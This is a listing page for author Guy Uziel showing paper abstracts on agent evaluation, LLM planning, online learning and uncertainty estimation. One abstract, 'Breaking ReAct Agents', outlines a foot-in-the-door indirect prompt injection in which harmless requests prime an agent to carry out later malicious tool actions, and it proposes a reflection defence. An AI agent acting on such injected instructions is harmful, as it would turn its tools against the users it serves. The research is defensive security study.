AITopics | Uziel, Guy

Collaborating Authors

Uziel, Guy

Information about AI from the News, Publications, and Conferences

Automatic Classification – Tagging and Summarization – Customizable Filtering and Analysis

If you are looking for an answer to the question What is Artificial Intelligence? and you only have a minute, then here's the definition the Association for the Advancement of Artificial Intelligence offers on its home page: "the scientific understanding of the mechanisms underlying thought and intelligent behavior and their embodiment in machines."

However, if you are fortunate enough to have more than a minute, then please get ready to embark upon an exciting journey exploring AI (but beware, it could last a lifetime) …

Survey on Evaluation of LLM-based Agents

Yehudai, Asaf, Eden, Lilach, Li, Alan, Uziel, Guy, Zhao, Yilun, Bar-Haim, Roy, Cohan, Arman, Shmueli-Scheuer, Michal

arXiv.org Artificial IntelligenceMar-20-2025

The emergence of LLM-based agents represents a paradigm shift in AI, enabling autonomous systems to plan, reason, use tools, and maintain memory while interacting with dynamic environments. This paper provides the first comprehensive survey of evaluation methodologies for these increasingly capable agents. We systematically analyze evaluation benchmarks and frameworks across four critical dimensions: (1) fundamental agent capabilities, including planning, tool use, self-reflection, and memory; (2) application-specific benchmarks for web, software engineering, scientific, and conversational agents; (3) benchmarks for generalist agents; and (4) frameworks for evaluating agents. Our analysis reveals emerging trends, including a shift toward more realistic, challenging evaluations with continuously updated benchmarks. We also identify critical gaps that future research must address-particularly in assessing cost-efficiency, safety, and robustness, and in developing fine-grained, and scalable evaluation methods. This survey maps the rapidly evolving landscape of agent evaluation, reveals the emerging trends in the field, identifies current limitations, and proposes directions for future research.

large language model, machine learning, natural language, (18 more...)

arXiv.org Artificial Intelligence

2503.16416

Country:

Europe > Italy (0.28)
Asia > Middle East > UAE (0.14)

Genre: Overview (1.00)

Industry:

Information Technology (0.46)
Education (0.46)

Technology:

Information Technology > Artificial Intelligence > Representation & Reasoning > Agents (1.00)
Information Technology > Artificial Intelligence > Natural Language > Large Language Model (1.00)
Information Technology > Artificial Intelligence > Machine Learning > Neural Networks > Deep Learning (0.46)

Add feedback

Breaking ReAct Agents: Foot-in-the-Door Attack Will Get You In

Nakash, Itay, Kour, George, Uziel, Guy, Anaby-Tavor, Ateret

arXiv.org Artificial IntelligenceOct-22-2024

Following the advancement of large language models (LLMs), the development of LLM-based autonomous agents has become increasingly prevalent. As a result, the need to understand the security vulnerabilities of these agents has become a critical task. We examine how ReAct agents can be exploited using a straightforward yet effective method we refer to as the foot-in-the-door attack. Our experiments show that indirect prompt injection attacks, prompted by harmless and unrelated requests (such as basic calculations) can significantly increase the likelihood of the agent performing subsequent malicious actions. Our results show that once a ReAct agents thought includes a specific tool or action, the likelihood of executing this tool in the subsequent steps increases significantly, as the agent seldom re-evaluates its actions. Consequently, even random, harmless requests can establish a foot-in-the-door, allowing an attacker to embed malicious instructions into the agents thought process, making it more susceptible to harmful directives. To mitigate this vulnerability, we propose implementing a simple reflection mechanism that prompts the agent to reassess the safety of its actions during execution, which can help reduce the success of such attacks.

large language model, machine learning, natural language, (18 more...)

arXiv.org Artificial Intelligence

2410.1695

Genre: Research Report > New Finding (1.00)

Industry: Information Technology > Security & Privacy (1.00)

Technology:

Information Technology > Artificial Intelligence > Representation & Reasoning > Agents (1.00)
Information Technology > Artificial Intelligence > Natural Language > Large Language Model (1.00)
Information Technology > Artificial Intelligence > Machine Learning > Performance Analysis > Accuracy (0.47)
Information Technology > Artificial Intelligence > Machine Learning > Neural Networks > Deep Learning (0.32)

Add feedback

What's the Plan? Evaluating and Developing Planning-Aware Techniques for Language Models

Hirsch, Eran, Uziel, Guy, Anaby-Tavor, Ateret

arXiv.org Artificial IntelligenceMay-22-2024

Planning is a fundamental task in artificial intelligence that involves finding a sequence of actions that achieve a specified goal in a given environment. Large language models (LLMs) are increasingly employed in applications that require such planning capabilities, including web and embodied agents. In line with recent studies, we demonstrate through experimentation that LLMs lack necessary skills required for planning. We focus on their ability to function as world models, and show that they struggle to simulate the complex dynamics of classic planning domains. Based on these observations, we advocate for the potential of a hybrid approach that combines language models with classical planning methodology. We introduce SimP lan, a novel hybrid architecture, utilizing external world modeling tools and the greedy best-first search algorithm. We assess its effectiveness in a rigorous set of experiments across a variety of challenging planning domains. Our results demonstrate that SimP lan significantly outperforms existing LLM-based planners, highlighting the critical role of search strategies and world models in planning applications.

large language model, machine learning, natural language, (19 more...)

arXiv.org Artificial Intelligence

2402.11489

Genre: Research Report > New Finding (1.00)

Technology:

Information Technology > Artificial Intelligence > Representation & Reasoning > Search (1.00)
Information Technology > Artificial Intelligence > Natural Language > Large Language Model (1.00)
Information Technology > Artificial Intelligence > Machine Learning > Neural Networks > Deep Learning (0.69)

Add feedback

Nonparametric Online Learning Using Lipschitz Regularized Deep Neural Networks

Uziel, Guy

arXiv.org Machine LearningMay-26-2019

In recent years, deep neural networks have been applied to many off-line machine learning tasks. Despite their state-of-of-the-art performance, the theory behind their generalization abilities is still not complete. When turning to the online domain even much less is known and understood both from the practical use and the theoretical side. Thus, the main focus of this paper is exploring the theoretical guarantees of deep neural networks in online learning under general stochastic processes. In the traditional online learning setting, and in particular in sequential prediction under uncertainty, the learner is evaluated by a loss function that is not entirely known at each iteration [8]. In this work, we study online prediction focusing on the challenging case where the unknown underlying process is stationary and ergodic, thus allowing observations to depend on each other arbitrarily. Many papers before have considered online learning under stationary and ergodic sources and in various application domains. For example, in online portfolio selection, [19, 16, 17, 42, 26] proposed nonparametric online strategies that guarantee, under mild conditions, convergence to the best possible outcome. 1

computer based training, deep learning, educational technology, (20 more...)

arXiv.org Machine Learning

1905.10821

Genre: Research Report (0.64)

Industry: Education > Educational Setting > Online (1.00)

Technology: Information Technology > Artificial Intelligence > Machine Learning > Neural Networks > Deep Learning (1.00)

Add feedback

Deep Online Learning with Stochastic Constraints

Uziel, Guy

arXiv.org Machine LearningMay-26-2019

In many real-world applications, one has to consider the minimization of several loss functions simultaneously, which is, of course, an impossible mission. Therefore, one objective is chosen as the primary function to minimize, leaving the others to be bound by predefined thresholds. For example, in online portfolio selection [5], the ultimate goal is to maximize the wealth of the investor while keeping the risk bounded by a user-defined constant. In the Neyman-Pearson (NP) classification (see, e.g., [22]), an extension of the classical binary classification, the goal is to learn a classifier achieving low type-II error whose type-I error is kept below a given threshold. Another example is the online job scheduling in distributed data centers (see, e.g., [14]), in which a job router receives job tasks and schedules them to different servers to fulfill the service. Each server purchases power (within its capacity) from its zone market, used for serving the assigned jobs. Electricity market prices can vary significantly across time and zones, and the goal is to minimize the electricity cost subject to the constraint that incoming jobs must be served in time. It is indeed possible to adjust any training algorithms capable of dealing with one objective loss to deal with multiple objectives by assigning a positive weight to each loss function. However, this modification turns out to be a difficult problem, especially in the case where one has to maintain the constraints below a given threshold online.

computer based training, constraint, deep learning, (22 more...)

arXiv.org Machine Learning

1905.10817

Genre: Research Report (0.82)

Industry: Education > Educational Setting > Online (0.52)

Technology:

Information Technology > Artificial Intelligence > Representation & Reasoning (1.00)
Information Technology > Artificial Intelligence > Machine Learning > Neural Networks > Deep Learning (0.50)

Add feedback

Boosting Uncertainty Estimation for Deep Neural Classifiers

Geifman, Yonatan, Uziel, Guy, El-Yaniv, Ran

arXiv.org Machine LearningMay-27-2018

We consider the problem of uncertainty estimation in the context of (non-Bayesian) deep neural classification. All current methods are based on extracting uncertainty signals from a trained network optimized to solve the classification problem at hand. We demonstrate that such techniques tend to misestimate instances whose predictions are supposed to be highly confident. This deficiency is an artifact of the training process with SGD-like optimizers. Based on this observation, we develop an uncertainty estimation algorithm that "peels away" highly confident points sequentially and estimates their confidence using earlier snapshots of the trained model, before their uncertainty estimates are jittered. We present extensive experiments indicating that the proposed algorithm provides uncertainty estimates that are consistently better than the best known methods.

algorithm, deep learning, neural network, (21 more...)

arXiv.org Machine Learning

1805.08206

Genre: Research Report (0.82)

Add feedback

Multi-Objective Non-parametric Sequential Prediction

Uziel, Guy, El-Yaniv, Ran

Neural Information Processing SystemsDec-31-2017

Online-learning research has mainly been focusing on minimizing one objective function. In many real-world applications, however, several objective functions have to be considered simultaneously. Recently, an algorithm for dealing with several objective functions in the i.i.d. case has been presented. In this paper, we extend the multi-objective framework to the case of stationary and ergodic processes, thus allowing dependencies among observations. We first identify an asymptomatic lower bound for any prediction strategy and then present an algorithm whose predictions achieve the optimal solution while fulfilling any continuous and convex constraining criterion.

artificial intelligence, optimization problem, prediction, (17 more...)

Neural Information Processing Systems

Country: North America > United States (0.14)

Technology:

Information Technology > Artificial Intelligence > Representation & Reasoning (1.00)
Information Technology > Artificial Intelligence > Machine Learning > Statistical Learning (0.82)

Add feedback